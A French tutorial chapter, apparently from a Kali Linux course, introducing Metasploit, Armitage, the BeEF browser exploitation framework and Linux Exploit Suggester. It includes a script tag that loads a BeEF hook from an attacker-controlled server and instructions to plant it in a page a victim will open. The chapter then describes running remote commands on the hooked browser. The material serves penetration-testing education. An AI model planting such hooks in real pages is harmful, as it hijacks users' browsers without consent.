Kali Linux - Outils d'exploitation

Dans ce chapitre, nous allons découvrir les différents outils d'exploitation proposés par Kali Linux.

Metasploit

Comme nous l'avons mentionné précédemment, Metasploit est un produit de Rapid7 et la plupart des ressources se trouvent sur leur page Web www.metasploit.com . Il est disponible en deux versions - édition commerciale et édition gratuite. Les différences entre ces deux versions ne sont donc pas beaucoup, dans ce cas, nous utiliserons la version communautaire (gratuite).

En tant que Ethical Hacker, vous utiliserez «Kali Ditribution» qui intègre la version communautaire de Metasploit, ainsi que d'autres outils de piratage éthique qui sont très confortables en économisant du temps d'installation. Cependant, si vous souhaitez installer en tant qu'outil séparé, il s'agit d'une application qui peut être installée dans les systèmes d'exploitation tels que Linux, Windows et OS X.

Tout d'abord, ouvrez la console Metasploit dans Kali. Ensuite, allez dans Applications → Outils d'exploitation → Metasploit.

Après son démarrage, vous verrez l'écran suivant, où la version de Metasploit est soulignée en rouge.

Dans la console, si vous utilisez l'aide ou? symbole, il vous montrera une liste avec les commandes de MSP avec leur description. Vous pouvez choisir en fonction de vos besoins et de ce que vous utiliserez.

Une autre commande d'administration importante est msfupdatequi aide à mettre à jour le metasploit avec les derniers exploits de vulnérabilité. Après avoir exécuté cette commande dans la console, vous devrez attendre plusieurs minutes jusqu'à ce que la mise à jour soit terminée.

Il a une bonne commande appelée "Rechercher" que vous pouvez utiliser pour trouver ce que vous voulez, comme indiqué dans la capture d'écran suivante. Par exemple, je veux trouver des exploits liés à Microsoft et la commande peut êtremsf >search name:Microsoft type:exploit.

Où «recherche» est la commande, «nom» est le nom de l'objet que nous recherchons et «type» est le type de script que nous recherchons.

Une autre commande est «info». Il fournit les informations concernant un module ou une plate-forme où il est utilisé, qui en est l'auteur, la référence de vulnérabilité et la restriction de charge utile que cela peut avoir.

Armitage

Armitage GUI pour metasploit est un outil complémentaire pour metasploit. Il visualise les cibles, recommande des exploits et expose les fonctionnalités avancées de post-exploitation.

Ouvrons-le, mais d'abord la console metasploit doit être ouverte et démarrée. Pour ouvrir Armitage, allez dans Applications → Outils d'exploit → Armitage.

Clique le Connect bouton, comme indiqué dans la capture d'écran suivante.

Lorsqu'il s'ouvre, vous verrez l'écran suivant.

Armitage est convivial. La zone «Cibles» répertorie toutes les machines que vous avez découvertes et avec lesquelles vous travaillez, les cibles piratées sont de couleur rouge avec un orage dessus.

Après avoir piraté la cible, vous pouvez cliquer dessus avec le bouton droit de la souris et continuer à explorer ce que vous devez faire, comme explorer (parcourir) les dossiers.

Dans l'interface graphique suivante, vous verrez la vue des dossiers, appelée console. En cliquant simplement sur les dossiers, vous pouvez naviguer dans les dossiers sans avoir besoin des commandes metasploit.

Sur le côté droit de l'interface graphique, se trouve une section où les modules de vulnérabilités sont répertoriés.

Du boeuf

BeEF signifie Browser Exploitation Framework. C'est un outil de test de pénétration qui se concentre sur le navigateur Web. BeEF permet au testeur de pénétration professionnel d'évaluer la position de sécurité réelle d'un environnement cible à l'aide de vecteurs d'attaque côté client.

Tout d'abord, vous devez mettre à jour le package Kali à l'aide des commandes suivantes -

[email protected]:/# apt-get update  
[email protected]:/# apt-get install beef-xss

Pour commencer, utilisez la commande suivante -

[email protected]:/# cd /usr/share/beef-xss  
[email protected]:/# ./beef

Ouvrez le navigateur et entrez le nom d'utilisateur et le mot de passe: beef.

Le hook BeEF est un fichier JavaScript hébergé sur le serveur BeEF qui doit s'exécuter sur les navigateurs clients. Quand c'est le cas, il rappelle le serveur BeEF en lui communiquant beaucoup d'informations sur la cible. Il permet également d'exécuter des commandes et des modules supplémentaires sur la cible. Dans cet exemple, l'emplacement deBeEF le crochet est à http://192.168.1.101:3000/hook.js.

Afin d'attaquer un navigateur, incluez le hook JavaScript dans une page que le client affichera. Il existe un certain nombre de façons de le faire, mais le plus simple est d'insérer ce qui suit dans une page et d'amener le client à l'ouvrir.

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>

Une fois la page chargée, retournez dans le panneau de configuration BeEF et cliquez sur «Navigateurs en ligne» en haut à gauche. Après quelques secondes, vous devriez voir votre adresse IP pop-up représentant un navigateur connecté. Le survol de l'adresse IP fournira rapidement des informations telles que la version du navigateur, le système d'exploitation et les plugins installés.

Pour exécuter la commande à distance, cliquez sur l'hôte «Possédé». Ensuite, sur la commande cliquez sur le module que vous souhaitez exécuter, et enfin cliquez sur «Exécuter».

Suggérateur d'exploit Linux

Il suggère des exploits possibles compte tenu de la version de sortie ‘uname -r’ du système d'exploitation Linux.

Pour l'exécuter, tapez la commande suivante -

[email protected]:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0 est la version du noyau du système d'exploitation Linux que nous voulons exploiter.